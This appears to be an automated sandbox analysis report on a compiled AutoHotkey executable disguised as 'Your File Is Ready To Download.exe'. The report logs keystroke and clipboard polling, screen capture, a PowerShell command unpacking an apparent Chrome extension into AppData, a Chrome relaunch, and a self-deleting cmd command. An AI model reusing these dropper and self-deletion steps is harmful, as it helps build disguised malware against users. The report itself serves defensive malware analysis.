Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.81.204:443 -> 192.168.2.3:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,

1_2_00000001400063F0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,

1_2_0000000140054730

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

1_2_0000000140001B0C

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

1_2_0000000140016300

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

1_2_0000000140006510

System Summary:

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Window found: window name: AutoHotkey

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

1_2_00000001400810B0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001E310	1_2_000000014001E310
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140088360	1_2_0000000140088360
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140048490	1_2_0000000140048490
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140018A20	1_2_0000000140018A20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001EB30	1_2_000000014001EB30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140014BA0	1_2_0000000140014BA0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140016D90	1_2_0000000140016D90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014000CF50	1_2_000000014000CF50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140005230	1_2_0000000140005230
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001F300	1_2_000000014001F300
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140085530	1_2_0000000140085530
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400415D0	1_2_00000001400415D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D1724	1_2_00000001400D1724
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D57CC	1_2_00000001400D57CC
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007D8A0	1_2_000000014007D8A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001F919	1_2_000000014001F919
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140055950	1_2_0000000140055950
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140001B0C	1_2_0000000140001B0C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140059D20	1_2_0000000140059D20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001FD1E	1_2_000000014001FD1E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140124000	1_2_0000000140124000
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007C03F	1_2_000000014007C03F
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140070060	1_2_0000000140070060
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D8074	1_2_00000001400D8074
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140028120	1_2_0000000140028120
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014000A120	1_2_000000014000A120
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140050135	1_2_0000000140050135
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005C140	1_2_000000014005C140
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014004C160	1_2_000000014004C160
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400581A0	1_2_00000001400581A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400741C0	1_2_00000001400741C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140076200	1_2_0000000140076200
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140080230	1_2_0000000140080230
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005E250	1_2_000000014005E250
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009825C	1_2_000000014009825C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014002A2C0	1_2_000000014002A2C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400A82F0	1_2_00000001400A82F0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014006E380	1_2_000000014006E380
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400503A4	1_2_00000001400503A4
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400523B0	1_2_00000001400523B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140040410	1_2_0000000140040410
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400BA53B	1_2_00000001400BA53B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014000A540	1_2_000000014000A540
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007A570	1_2_000000014007A570
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400CE59C	1_2_00000001400CE59C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008E5B0	1_2_000000014008E5B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400605B9	1_2_00000001400605B9
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400DC5FC	1_2_00000001400DC5FC
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140058660	1_2_0000000140058660
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400BC670	1_2_00000001400BC670
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140074680	1_2_0000000140074680
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140020680	1_2_0000000140020680
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140032681	1_2_0000000140032681
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400986A1	1_2_00000001400986A1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400466C0	1_2_00000001400466C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008C6C3	1_2_000000014008C6C3
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140054730	1_2_0000000140054730
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014004A740	1_2_000000014004A740
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400BA760	1_2_00000001400BA760
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D07B0	1_2_00000001400D07B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400027BB	1_2_00000001400027BB
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400507D0	1_2_00000001400507D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007E830	1_2_000000014007E830
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400448D0	1_2_00000001400448D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007A8E0	1_2_000000014007A8E0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014006C8F0	1_2_000000014006C8F0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400A2900	1_2_00000001400A2900
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140064950	1_2_0000000140064950
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400989AD	1_2_00000001400989AD
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400929C0	1_2_00000001400929C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140034A15	1_2_0000000140034A15
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EA20	1_2_000000014008EA20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140062A60	1_2_0000000140062A60
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140012A90	1_2_0000000140012A90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140070AD0	1_2_0000000140070AD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005AB70	1_2_000000014005AB70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140060B80	1_2_0000000140060B80
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014003EBC0	1_2_000000014003EBC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400DCBE0	1_2_00000001400DCBE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140084C00	1_2_0000000140084C00
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400D4C18	1_2_00000001400D4C18
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009CC50	1_2_000000014009CC50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140006C60	1_2_0000000140006C60
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008CC90	1_2_000000014008CC90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005CC90	1_2_000000014005CC90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140034CA5	1_2_0000000140034CA5
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400B0CD0	1_2_00000001400B0CD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014004ECD0	1_2_000000014004ECD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140056CE0	1_2_0000000140056CE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140010CF0	1_2_0000000140010CF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009ED00	1_2_000000014009ED00
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005ED30	1_2_000000014005ED30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140058D70	1_2_0000000140058D70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014004ADC0	1_2_000000014004ADC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400AEE30	1_2_00000001400AEE30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140038E2C	1_2_0000000140038E2C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007CE48	1_2_000000014007CE48
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140050E90	1_2_0000000140050E90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140070EA1	1_2_0000000140070EA1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140062ED0	1_2_0000000140062ED0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EF7D	1_2_000000014008EF7D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EF8C	1_2_000000014008EF8C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EFA8	1_2_000000014008EFA8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EFCA	1_2_000000014008EFCA
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EFEB	1_2_000000014008EFEB
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005F000	1_2_000000014005F000
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EFF7	1_2_000000014008EFF7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008F01D	1_2_000000014008F01D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140073050	1_2_0000000140073050
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140099048	1_2_0000000140099048
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008F05E	1_2_000000014008F05E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140087091	1_2_0000000140087091
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014005B0B0	1_2_000000014005B0B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400B70E0	1_2_00000001400B70E0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140091108	1_2_0000000140091108
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014003F130	1_2_000000014003F130
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014007B14E	1_2_000000014007B14E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140025154	1_2_0000000140025154
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140089180	1_2_0000000140089180
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140065180	1_2_0000000140065180
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400531B0	1_2_00000001400531B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400431B0	1_2_00000001400431B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400031C3	1_2_00000001400031C3
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014006F1D0	1_2_000000014006F1D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014004D200	1_2_000000014004D200
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400C7220	1_2_00000001400C7220
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140019230	1_2_0000000140019230

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: String function: 0000000140040160 appears 291 times
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: String function: 00000001400C8EEC appears 174 times
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: String function: 000000014003FE10 appears 37 times

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,

1_2_000000014005EF30

Source: Your File Is Ready To Download.exe	Binary or memory string: OriginalFilename vs Your File Is Ready To Download.exe
Source: Your File Is Ready To Download.exe, 00000001.00000000.282201544.0000000140127000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs Your File Is Ready To Download.exe
Source: Your File Is Ready To Download.exe	Binary or memory string: OriginalFilename vs Your File Is Ready To Download.exe

Source: Your File Is Ready To Download.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Your File Is Ready To Download.exe

Virustotal: Detection: 19%

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Your File Is Ready To Download.exe "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

1_2_00000001400810B0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

File created: C:\Users\user\AppData\Roaming\chromeext.zip

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mstg0eih.qml.ps1

Jump to behavior

Source: classification engine

Classification label: mal51.evad.winEXE@41/255@6/8

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014007E830 CoInitialize,CoCreateInstance,malloc,malloc,malloc,malloc,malloc,malloc,CoUninitialize,

1_2_000000014007E830

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400605B9 wcsncpy,GetDiskFreeSpaceW,GetLastError,malloc,

1_2_00000001400605B9

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400415D0 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,

1_2_00000001400415D0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Mutant created: \Sessions\1\BaseNamedObjects\AHK Mouse
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Mutant created: \Sessions\1\BaseNamedObjects\AHK Keybd
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_01

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_00000001400203C0 FindResourceW,FindResourceW,SizeofResource,LoadResource,LockResource,

1_2_00000001400203C0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: Your File Is Ready To Download.exe	String found in binary or memory: exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } Run, chrome.exe --start-maximized Sleep 100 st = ahk_class Chrome_WidgetWin_1 WinWait, %st% IfWinNotActive, %st%,, WinActivate, %st% WinGet, WinStatus, MinMax, %st% if (WinStatus != 0) WinRestore, ahk_exe chrome.
Source: Your File Is Ready To Download.exe	String found in binary or memory: Run, chrome.exe --start-maximized

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Your File Is Ready To Download.exe

